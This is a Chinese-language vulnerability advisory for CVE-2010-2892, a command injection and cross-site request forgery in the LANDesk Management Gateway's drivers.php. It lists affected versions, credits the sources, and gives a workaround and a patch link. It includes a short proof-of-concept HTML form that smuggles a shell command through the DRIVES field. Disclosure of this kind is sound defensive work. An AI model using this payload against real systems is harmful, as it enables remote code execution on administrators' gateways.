LANDesk管理套件HTML表单请求命令注入漏洞


LANDesk管理套件HTML表单请求命令注入漏洞

发布日期:2010-11-09
更新日期:2010-11-11

受影响系统:
LANDesk Software LANDesk Management Gateway 4.2 GSBWEB v1.61
LANDesk Software LANDesk Management Gateway 4.0 GSBWEB v1.61s
不受影响系统:
LANDesk Software LANDesk Management Gateway 4.2 GSBWEB v1.62
LANDesk Software LANDesk Management Gateway 4.0 GSBWEB v1.62
描述:
--------------------------------------------------------------------------------
CVE ID: CVE-2010-2892

Landesk管理套件是一款网络管理系统,可控制桌面,服务器和移动设备等。

Landesk没有正确地验证提交特制请求的用户来源。如果管理员使用攻击者的浏览器登录到了设备,攻击者就可以以gsbadmin用户权限执行任意代码。

<*来源:Aureliano Calvo
 
  链接:http://marc.info/?l=full-disclosure&m=128943189002312&w=2
        http://secunia.com/advisories/42188/
*>

测试方法:
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

/-----
<head><title>LANDesk PoC</title></head>
  <body>
    <form method="post" action="https://[server]/gsb/drivers.php">
      <input type="text" name="DRIVES" value="; touch /tmp/ATTACKED">
      <input type="text" name="SECONDTIME" value="1">
      <input type="text" name="ACTION" value="getupdate">
      <input type="submit" value="Attack!">
    </form>
  </body>
</html>
-----/

建议:
--------------------------------------------------------------------------------
临时解决方法:

1. 启动SSH控制台会话,或登录到LDMG控制台并启动终端会话。
2. 发布以下命令:mv/usr/LANDesk/broker/webroot/gsb/drivers.php ~

厂商补丁:

LANDesk Software
----------------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

http://community.landesk.com/support/docs/DOC-21767

相关内容